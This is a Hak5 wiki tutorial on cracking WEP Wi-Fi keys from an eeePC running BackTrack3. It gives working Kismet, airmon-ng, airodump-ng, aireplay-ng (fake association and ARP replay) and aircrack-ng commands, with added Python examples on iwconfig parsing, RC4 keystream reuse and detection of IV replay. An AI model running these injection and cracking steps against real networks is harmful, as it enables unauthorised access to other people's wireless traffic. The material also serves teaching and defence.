
Eeepc wifi hacking

From Hak5


Overview

The eeePC's Atheros wifi card is natively supported by BackTrack3 with madwifi drivers patched for injection. This brief tutorial explains the steps necessary to perform WEP cracking on the eeePC. Thoroughly explaining WEP cracking concepts is not the intent of this article, though with the specified hardware and software, following along should result in successful WEP cracking. For more detailed information on the tools used, please follow the links in the Further Reading section below.

Prerequisites

This article assumes a basic knowledge of Linux and is targeted at eeePC users with BackTrack3 either installed or booting from USB/SD.

Before we begin we must know a few things about our host and our target. Start by noting the BSSID of your wireless adapter.

iwconfig

The BSSID of your wireless card is displayed next to Access Point under ath0; this is the address passed to aireplay-ng's -h option later on. In this example the BSSID is 00:15:af:67:65:00.

Next we need the MAC address of the target. For this we will use the wireless detection program Kismet. While BackTrack3 supports the eeePC's hardware out of the box, we must configure Kismet to use the madwifi driver as its source.

nano -w /usr/local/etc/kismet.conf

Change the source configuration as follows:

source=madwifi_g,wifi0,madwifi #For Atheros

Now we can start Kismet and find the BSSID of our target wireless access point.

kismet

By default Kismet displays in autofit mode. To see more information about each discovered access point we must change the view. Press s to bring up the sort-mode selection dialogue and choose a sorting method; I use s to sort by SSID. Next, use the up/down arrows to select the SSID of the target access point and press i for network details. Ensure that the encryption type is marked as WEP and note the BSSID. In this example the SSID is "hackme" and the BSSID is 00:09:5B:FF:4F:B6.


Starting the wireless interface in monitor mode

Monitor mode allows wireless interfaces to monitor wireless network traffic without being associated to an access point. While most wireless network cards do not support transmitting in monitor mode the eeePC's Atheros card is fully supported by BackTrack3 with madwifi drivers. Airsnort has a good explanation of the difference between monitor mode and promiscuous mode.

Before we bring the wireless interface up in monitor mode we must stop whatever it may be doing by running

airmon-ng stop ath0

Next we run iwconfig to verify that no wireless extensions are up.

iwconfig

Finally start the wireless card in monitor mode on channel 11 by issuing

airmon-ng start wifi0 11
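The iwconfig output consulted in the prerequisites and again after airmon-ng can be checked by script rather than by eye. The following Python is an added example, not part of the original article: it parses text in iwconfig's layout (the two samples below are constructed to match that layout and reuse the 00:15:af:67:65:00 address quoted above), reports each interface's mode and Access Point field, converts the 2.4 GHz frequency to a channel number, and confirms which interface, if any, is in monitor mode on the expected channel.

```python
import re

# Constructed sample text in iwconfig's layout (not captured from a real eeePC);
# the Access Point value reuses the address quoted in this article.
SAMPLE_BEFORE = """\
lo        no wireless extensions.

wifi0     no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Managed  Frequency:2.437 GHz  Access Point: 00:15:AF:67:65:00
          Bit Rate:0 kb/s   Tx-Power:16 dBm   Sensitivity=1/1
          Encryption key:off
"""

# Constructed sample as the same card might report after `airmon-ng start wifi0 11`.
SAMPLE_MONITOR = """\
wifi0     no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.462 GHz  Access Point: 00:15:AF:67:65:00
          Bit Rate:0 kb/s   Tx-Power:16 dBm   Sensitivity=1/1
"""

MAC = r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}"
FIELDS = {
    "essid": re.compile(r'ESSID:"([^"]*)"'),
    "mode": re.compile(r"Mode:(\S+)"),
    "access_point": re.compile(r"Access Point:\s*(" + MAC + ")"),
    "frequency_ghz": re.compile(r"Frequency:([\d.]+) GHz"),
}


def parse_iwconfig(text):
    """Return {iface: {essid, mode, access_point, frequency_ghz}} for every
    interface that reports wireless extensions; the others are skipped."""
    result, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():            # a new interface block starts
            iface, _, rest = line.partition(" ")
            if "no wireless extensions" in rest:
                current = None
                continue
            current = result.setdefault(iface, dict.fromkeys(FIELDS))
            line = rest
        if current is None:
            continue
        for name, pattern in FIELDS.items():
            m = pattern.search(line)
            if m:
                value = m.group(1)
                if name == "access_point":
                    value = value.lower()
                elif name == "frequency_ghz":
                    value = float(value)
                current[name] = value
    return result


def freq_to_channel(ghz):
    """Map a 2.4 GHz centre frequency to its 802.11b/g channel (1-14)."""
    if abs(ghz - 2.484) < 0.001:
        return 14
    ch = round((ghz - 2.407) / 0.005)
    return ch if 1 <= ch <= 13 else None


def monitor_interfaces(parsed):
    """List (iface, channel) for every interface whose Mode is Monitor."""
    return [(iface, freq_to_channel(info["frequency_ghz"]) if info["frequency_ghz"] else None)
            for iface, info in parsed.items() if info["mode"] == "Monitor"]


def monitor_ready(text, channel):
    """True when exactly one interface is in monitor mode on `channel`."""
    return [ch for _, ch in monitor_interfaces(parse_iwconfig(text))] == [channel]


if __name__ == "__main__":
    print(parse_iwconfig(SAMPLE_BEFORE))
    print("monitor mode on channel 11:", monitor_ready(SAMPLE_MONITOR, 11))
```

On a live system, feed `subprocess.check_output(["iwconfig"], text=True)` to parse_iwconfig instead of the constructed samples; the interface and field names are the only assumptions the parser makes.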


Capturing IVs

WEP encrypts each frame with RC4 using a per-frame key made of a 24-bit initialisation vector (IV), sent in the clear, prepended to the shared secret key. Because there are only 2^24 IVs, they repeat on a busy network, and the statistical attacks implemented by aircrack-ng recover the shared key from a large sample of captured IVs and their ciphertext; the steps below exist to collect that sample quickly.
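As an added illustration that is not part of the original article, the following Python implements RC4 and the WEP per-frame key construction (IV followed by the shared key, with the ICV left out for brevity) to show the two facts the capture step relies on: two frames encrypted under a repeated IV share a keystream, so XORing their ciphertexts yields the XOR of their plaintexts, and the birthday bound on a 24-bit IV space puts a 50% chance of a repeat at only a few thousand random IVs. The key, IV and payloads are constructed values.

```python
import math


def rc4_keystream(key, length):
    """Plain RC4: key scheduling (KSA), then `length` bytes from the PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, key, plaintext):
    """WEP's per-frame RC4 key is the 3-byte IV followed by the shared key;
    the IV is transmitted in the clear in front of the ciphertext."""
    if len(iv) != 3:
        raise ValueError("a WEP IV is 24 bits")
    return iv + xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


def wep_decrypt(frame, key):
    iv, ct = frame[:3], frame[3:]
    return xor_bytes(ct, rc4_keystream(iv + key, len(ct)))


def keystream_reuse_leak(frame1, frame2):
    """Two frames under the same key and IV share a keystream, so XORing the
    ciphertexts cancels it and leaves plaintext1 XOR plaintext2. Returns None
    when the IVs differ (no keystream reuse)."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])


def frames_until_iv_repeat(probability, iv_space=2 ** 24):
    """Birthday bound: frames with uniformly random IVs needed before the
    chance of at least one repeated IV reaches `probability`. Many WEP cards
    used a plain counter instead, which guarantees a repeat after 2**24 frames."""
    return math.ceil(math.sqrt(2 * iv_space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")        # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")             # constructed IV, reused on purpose
    pt1, pt2 = b"who-has 192.168.1.1", b"who-has 192.168.1.9"
    f1, f2 = wep_encrypt(iv, key, pt1), wep_encrypt(iv, key, pt2)
    print("ct1 ^ ct2 == pt1 ^ pt2:", keystream_reuse_leak(f1, f2) == xor_bytes(pt1, pt2))
    print("frames for a 50% IV repeat:", frames_until_iv_repeat(0.5))
```

The leak is what makes predictable traffic such as ARP requests valuable to an attacker and is the reason WEP is treated as no encryption at all; the birthday figure of roughly 4,800 frames explains why the capture does not need to run for long on a busy network.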

Start airodump-ng, set to capture IVs from our target BSSID and write them to a file:

airodump-ng -c 11 --bssid 00:09:5B:FF:4F:B6 -w output ath0

Fake association with AP

aireplay-ng -1 0 -e hackme -a 00:09:5B:FF:4F:B6 -h 00:15:af:67:65:00 ath0

Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:09:5B:FF:4F:B6 -h 00:15:af:67:65:00 ath0

Get WEP key

aircrack-ng -z -b 00:09:5B:FF:4F:B6 output*.cap
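The same commands leave a signature that a wireless IDS can look for. The following Python is an added example, not part of the original article or of the aircrack-ng suite: it runs a simple detector over constructed frame records (timestamp, type, source, destination, IV) addressed to the BSSID used in this article. A replayed frame is re-injected byte for byte, so its IV repeats hundreds of times per second from one source, whereas a normal client uses a fresh IV for each frame; the detector flags any (source, IV) pair repeated above a threshold inside a sliding window and also reports a per-source IV-reuse ratio. The thresholds, record format and sample traffic are assumptions of the example.

```python
from collections import defaultdict, deque

AP = "00:09:5b:ff:4f:b6"          # BSSID quoted in this article
REPLAY_THRESHOLD = 50             # same (src, IV) seen this often ...
WINDOW_SECONDS = 2.0              # ... inside this sliding window -> alert


def detect_iv_replay(frames, threshold=REPLAY_THRESHOLD, window=WINDOW_SECONDS):
    """Flag a source that re-injects one encrypted frame over and over.
    A replayed frame carries the same IV every time, while a normally
    behaving client changes its IV per frame, so a high rate of repeats of a
    single (src, IV) pair is the signature. One alert per (src, IV)."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda f: f["t"]):
        if f["kind"] != "data" or f["dst"] != AP:
            continue
        key = (f["src"], f["iv"])
        q = recent[key]
        q.append(f["t"])
        while q and f["t"] - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": f["src"], "iv": f["iv"], "count": len(q), "t": round(f["t"], 3)})
    return alerts


def iv_reuse_ratio(frames, src):
    """Fraction of a source's data frames whose IV it had already used:
    near 0 for a healthy client, near 1 for a replay source."""
    seen, reused, total = set(), 0, 0
    for f in frames:
        if f["kind"] == "data" and f["src"] == src:
            total += 1
            if f["iv"] in seen:
                reused += 1
            seen.add(f["iv"])
    return reused / total if total else 0.0


def benign_frames(src="00:11:22:33:44:55", n=20):
    """Constructed: one frame every half second, fresh IV each time."""
    return [{"t": i * 0.5, "kind": "data", "src": src, "dst": AP,
             "iv": f"{0x100 + i:06x}", "len": 120} for i in range(n)]


def replay_frames(src="00:15:af:67:65:00", n=300):
    """Constructed: the same 68-byte frame (same IV) 300 times in one second."""
    return [{"t": 3.0 + i / n, "kind": "data", "src": src, "dst": AP,
             "iv": "0a0b0c", "len": 68} for i in range(n)]


def sample_capture():
    return benign_frames() + replay_frames()


if __name__ == "__main__":
    for a in detect_iv_replay(sample_capture()):
        print(f"ALERT t={a['t']}s src={a['src']} iv={a['iv']} repeated {a['count']}x")
    print("reuse ratio, replay source:", iv_reuse_ratio(sample_capture(), "00:15:af:67:65:00"))
```

Real captures would be decoded from a pcap with a library such as scapy into the same record shape; the threshold of 50 repeats in two seconds is deliberately far above anything a legitimate 802.11 retransmission produces. The durable mitigation is not detection but retiring WEP in favour of WPA2 or WPA3, which do not reuse keystream per frame.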

Further Reading

  • http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
  • http://www.kismetwireless.net/documentation.shtml
  • http://forums.remote-exploit.org/archive/index.php/t-5876.html
  • http://forum.eeeuser.com/viewtopic.php?id=4229

Thanks

  • collaption
  • mubix
  • negen
  • ghaze